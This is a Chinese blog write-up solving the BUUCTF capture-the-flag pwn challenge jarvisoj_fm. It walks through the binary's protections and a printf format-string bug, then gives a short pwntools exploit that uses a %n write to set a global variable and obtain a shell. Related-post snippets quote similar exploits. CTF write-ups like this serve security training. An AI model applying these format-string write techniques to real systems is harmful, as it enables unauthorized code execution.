buuctf【jarvisoj_fm】解题

满堂花醉三千客，一剑秋寒十四州

已于 2024-09-04 10:15:29 修改

阅读量280

点赞数 2

分类专栏：二进制安全文章标签： android

于 2024-09-04 10:14:21 首次发布

本文链接：https://blog.csdn.net/qq_29317353/article/details/141884982

版权

二进制安全专栏收录该内容

4 篇文章 1 订阅

订阅专栏

拿到例题之后先查看一下保护
在这里插入图片描述
发现开启Canary(金丝雀)，NX（栈不可执行），未开启地址随机化（PIE）
脱入ida查看伪代码发现当x等于4的时候执行/bin/sh

x的地址为0x0804A02C

发现格式化字符串漏洞，read函数读取用户输入，prinrf打印用户输入，导致printf参数可控
在这里插入图片描述脱入gdb查看输入在栈上偏移
在0x080485C4的位置上下断点发现用户输入的偏移位置是11

当前已知：程序存在格式化字符串漏洞
当x=4时执行/bin/sh
x的地址为0x0804A02C
用户输入在栈上的偏移位置是11

编写exp

from pwn import *
p=process('fm')
#p=remote('node5.buuoj.cn',28553)
x_addr=0x0804A02C
payload="aaaa"+"%14$"+"naaa"+p32(x_addr).decode('unicode_escape')
p.sendline(payload)
p.interactive()

说一下为什么这里偏移变成了14，aaaa是第11个，%14$是第12个，naaa是第13个，x_addr就是第14个了
运行exp，x的值已经变为4执行/bin/sh，getshell
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

满堂花醉三千客，一剑秋寒十四州

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF：jarvisoj_fm（write up）

qq_44768749的博客

08-24

458

BUUCTF：jarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析开启了栈不可执行、canary以及部分RELRO保护 0x02 运行运行未发现什么异常，但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单，关键部分都在主函数中，有getshell的函数，当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3，需要利用格式化字符串漏洞改写x的值测试格式

BUUCTF jarvisoj exp整合

菜的只能随便写写博客

02-24

604

0x01 jarvisoj_level0 简单的地址改写 from pwn import * p = remote('node3.buuoj.cn', 26882) #p = process('./level0') shell_addr = 0x0000000000400596 p.sendline('a'*0x88+p64(shell_addr)) p.interactive() ...

1 条评论您还未登录，请先登录后发表或查看评论

buuctf jarvisoj_fm

pondzhang的专栏

03-19

313

存在格式化字符串漏洞而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n，意思将0x0804A02C的x地址写入32位大小的一个...

buuctf jarvisoj_fm

carol2358的博客

05-04

233

先运行， AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位，然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...

jarvisoj_fm【BUUCTF】

qq_41696518的博客

08-31

324

jarvisoj_fm【BUUCTF】

BUUCTF pwn——jarvisoj_fm

CNS-Enterprise BCC-1701-J

04-13

251

BUUCTF 做题练习

FM.zip_FM_FM matlab_FM调制解调_fm解调_fm调制

09-21

在本文中，我们将深入探讨由标题“FM.zip_FM_FM matlab_FM调制解调_fm解调_fm调制”所涵盖的FM（频率调制）技术，以及如何使用MATLAB进行FM调制与解调的仿真。MATLAB是一款强大的数学计算软件，广泛应用于信号处理和...

FM.rar_FM_FM matlab_FM 解调_demodulation FM_fm pm matlab

09-23

标题中的"FM.rar_FM_FM matlab_FM 解调_demodulation FM_fm pm matlab"指出这是一个与调频（FM）解调相关的MATLAB程序。在通信领域，调频是一种广泛使用的无线电信号传输方式，而解调是接收端将接收到的调频信号还原...

fm.zip_FM解调matlab_fm 调制解调_fm解调_fm调制公式_fm调制算法

09-23

标题中的"fm.zip_FM解调matlab_fm 调制解调_fm解调_fm调制公式_fm调制算法"指的是一个包含FM（频率调制）解调和调制的MATLAB实现及相关理论介绍的压缩包文件。这个压缩包可能包含了源代码、教程文档或示例数据，...

BUUCTF 刷题 jarvisoj_fm

Helloity的博客

02-13

392

题目：BUUCTF在线评测 checksec一下，32位程序，有canary，开NX Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) 放到ida里f5一下，发现一个明显的printf格式化字符串漏洞，我们需要控制x的值为4，就可以获得binsh int __cd

[PWN] BUUCTF jarvisoj_fm

空城惜梦的博客

06-05

418

[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro，canary,nx 执行程序，观察程序的逻辑，在打印出输入的字符后，会打印出3! 32IDA打开查看主要函数main，观察到在红框那里存在的很明显的格式化字符串漏洞，而且当x==4时，会得到flag，根据之前执行的程序可知，未修改x之前x的值为3，则若要修改x，需要利用格式化字符串漏洞的任意地址读写解题思路利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",

[BUUCTF]PWN——jarvisoj_fm

mcmuyanga的博客

10-31

1175

jarvisoj_fm 附件步骤：例行检查，32位，开启了canary和nx保护运行一下程序，看看大概的情况 32位ida载入，shift+f12检索程序里的字符串，看见了 " /bin/sh " 字符串双击跟进，找到程序主体，当x=4的时候会执行system（/bin/sh）第10行存在格式化字符串漏洞，我们可以利用它随意读写的特性让x=4 x_addr=0x804A02C 来找一下输入点的参数在栈上存储的位置，手动输入计算得到偏移为11 利用x的地址配合上%11

BUUCTF-jarvisoj_fm1-WP

Rt1Text的博客

10-30

285

有canary ,题目提升fm,考虑格式化字符串。

BUUCTF|pwn-jarvisoj_fm-wp

l2645470582_的博客

11-09

327

1.例行检查保护机制我们看到开启了堆和栈保护 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串我们看到关键字符串“/bin/sh” 3.我们看看main函数里面有什么我们看到如果x == 4，程序就会执行system("/bin/sh"),拿到权限这里是格式化字符串漏洞 x是全局变量，位置在data段上：x_addr = 0x0804A02C 我们看看参数在栈上的位置，我们发现aaaa的位置在第十一个 4....

BUUCTF ciscn_2019_ne_5 & jarvisoj_fm

红叶的博客

11-01

739

只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。

BUU刷题-Pwn-jarvisoj_fm